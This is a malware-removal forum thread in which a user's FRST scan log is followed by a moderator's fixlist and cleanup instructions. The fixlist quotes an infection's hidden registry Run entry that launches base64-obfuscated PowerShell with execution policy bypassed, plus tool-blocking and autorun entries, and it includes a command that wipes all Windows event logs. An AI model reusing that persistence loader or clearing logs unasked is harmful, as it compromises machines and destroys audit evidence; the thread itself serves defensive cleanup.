2017-04-24 16:05 - 2017-04-24 16:05 - 00001080 _____ C:\Users\Public\Desktop\SMADΔV.lnk
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\Users\USER\AppData\Roaming\Smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus
2017-04-24 16:03 - 2017-04-24 16:03 - 01500777 _____ (Smadsoft ) C:\Users\USER\Downloads\smadav2017.exe
2017-04-16 21:29 - 2017-04-16 21:39 - 100223515 _____ C:\Users\USER\Downloads\Manchester United vs Chelsea 2-0 2017 - Highlights _ Goals.mp4
2017-04-16 14:57 - 2017-04-16 14:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf
2017-04-15 22:08 - 2017-04-15 23:03 - 43901813 _____ C:\Users\USER\Downloads\Cristiano Ronaldo ● Complete Goalscorer, Scoring in Every Way.mp4.part
2017-04-14 13:35 - 2017-04-14 13:36 - 00069080 _____ C:\Users\USER\Downloads\Tutorial for freelancers.pdf
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPST
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\Program Files (x86)\QPST
2017-04-12 19:19 - 2017-04-12 19:21 - 08233607 _____ C:\Users\USER\Downloads\QPST Software_2.7.323 (Unlock-Huawei-Zte.Blogspot.Com).zip
2017-04-07 14:22 - 2017-04-07 14:22 - 00000890 _____ C:\Users\USER\Downloads\Documents - Shortcut.lnk
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Roaming\Opera Software
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Local\Opera Software
2017-04-06 11:54 - 2017-04-24 15:50 - 00003832 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1491468847
2017-04-06 11:54 - 2017-04-24 15:49 - 00001143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-06 11:54 - 2017-04-06 11:54 - 00001143 _____ C:\Users\Public\Desktop\Opera.lnk
2017-04-06 11:36 - 2017-04-24 15:50 - 00000000 ____D C:\Program Files (x86)\Opera
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\Users\USER\AppData\Roaming\BluetoothDriverInstaller
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\ProgramData\TEMP
2017-04-05 13:25 - 2017-04-05 13:25 - 03260416 _____ (BluetoothInstaller.com) C:\Users\USER\Downloads\BluetoothDriverInstaller_x64.exe
2017-04-05 10:32 - 2017-05-05 12:02 - 00000000 ____D C:\Windows\Minidump

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-05 12:41 - 2016-12-14 21:16 - 00000000 ____D C:\Users\USER\AppData\Roaming\Skype
2017-05-05 12:34 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\tracing
2017-05-05 12:02 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Inf
2017-05-05 12:01 - 2017-01-16 09:06 - 00000000 ____D C:\Users\USER\AppData\LocalLow\Mozilla
2017-05-05 12:00 - 2017-02-06 12:06 - 00000000 ____D C:\Program Files (x86)\Ask.com
2017-05-05 11:38 - 2017-01-20 17:18 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2017-05-05 11:38 - 2013-08-22 17:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-05 11:29 - 2017-01-24 10:59 - 00000000 ____D C:\Program Files (x86)\Driver Downloader
2017-05-05 11:24 - 2016-11-27 13:45 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1975919165-801266099-53085287-1001
2017-05-05 11:12 - 2013-08-22 16:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-05-04 21:11 - 2016-11-27 13:58 - 00000000 ____D C:\Users\USER\AppData\Roaming\vlc
2017-05-04 15:57 - 2016-11-27 13:44 - 00818732 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-04 10:27 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\AppReadiness
2017-05-02 22:20 - 2016-11-27 13:39 - 00000000 ____D C:\Users\USER\AppData\Local\Packages
2017-05-02 10:02 - 2016-11-27 13:45 - 00000000 ____D C:\ProgramData\KMSAutoS
2017-05-01 19:07 - 2017-03-09 18:51 - 00000000 ____D C:\Users\USER\AppData\Roaming\Grammarly
2017-04-29 08:52 - 2016-11-29 01:28 - 00000000 ____D C:\Users\USER\AppData\Roaming\dvdcss
2017-04-28 20:44 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\WhatsApp
2017-04-28 20:38 - 2017-01-16 01:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-28 20:38 - 2016-11-27 14:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 17:22 - 2017-01-11 10:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-28 17:22 - 2017-01-11 10:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-28 12:02 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\SquirrelTemp
2017-04-27 16:48 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\WhatsApp
2017-04-27 16:47 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2017-04-27 12:12 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\system32\NDF
2017-04-22 23:10 - 2016-11-27 13:59 - 00000000 ____D C:\Users\USER\Downloads\SHAREit
2017-04-22 22:28 - 2016-12-23 12:33 - 00000510 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2017-04-13 19:50 - 2017-01-30 16:13 - 00000000 ____D C:\Users\USER\AppData\Local\Package Cache
2017-04-13 18:08 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\LiveKernelReports
2017-04-12 19:24 - 2016-11-27 13:47 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-04-06 17:02 - 2016-12-14 21:52 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
2017-04-06 17:02 - 2016-12-14 21:15 - 00000000 ____D C:\ProgramData\Skype

==================== Files in the root of some directories =======

2017-01-24 11:11 - 2017-01-24 11:11 - 0794046 _____ () C:\Program Files\d32aaa99ba12e4ec21a96aaae151488b.rar
2017-04-25 19:58 - 2017-04-25 19:58 - 0199010 __RSH () C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-01 18:21 - 2017-04-01 18:21 - 0000000 ____H () C:\Users\USER\AppData\Roaming\Microsoft\AppData.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-05-03 20:18

==================== End of FRST.txt ============================


  • 0

Advertisements

#2
JSntgRvr
Posted 05 May 2017 - 05:28 PM

JSntgRvr

    Global Moderator

  • Global Moderator
  • 11,579 posts

Welcome. :)

  • Highlight the entire content of the quote box below.

 

Start::  
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset C:\resettcpip.txt
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
CMD: Bitsadmin /Reset /Allusers
EMPTYTEMP:
Reboot:
End::

  • Right click on it and select Copy.
  • Start FRST (FRST64) with Administrator privileges
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) will pop up and saved in the same location the tool was ran from.

Please copy and paste its contents in your next reply.

Please download Junkware Removal Tool to your Desktop.

  • Please close your security software to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
  • Please post the contents of JRT.txt into your reply.

Download AdwCleaner from here. Save the file to the desktop.

NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.

  • XP users: Double click the AdwCleaner icon to start the program.
  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

iO5EZayK.png


  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • Click the Clean button.
  • Everything checked will be moved to Quarantine.
  • When the program has finished cleaning a report appears.Once done it will ask to reboot, allow this

adwcleaner_delete_restart.jpg


  • On reboot a log will be produced please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[C0].txt

 


  • 0

#3
JSntgRvr
Posted 20 May 2017 - 06:55 PM

JSntgRvr

    Global Moderator

  • Global Moderator
  • 11,579 posts

Are you still with us?


  • 0

#4
JSntgRvr
Posted 31 May 2017 - 10:10 AM

JSntgRvr

    Global Moderator

  • Global Moderator
  • 11,579 posts

Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.


  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP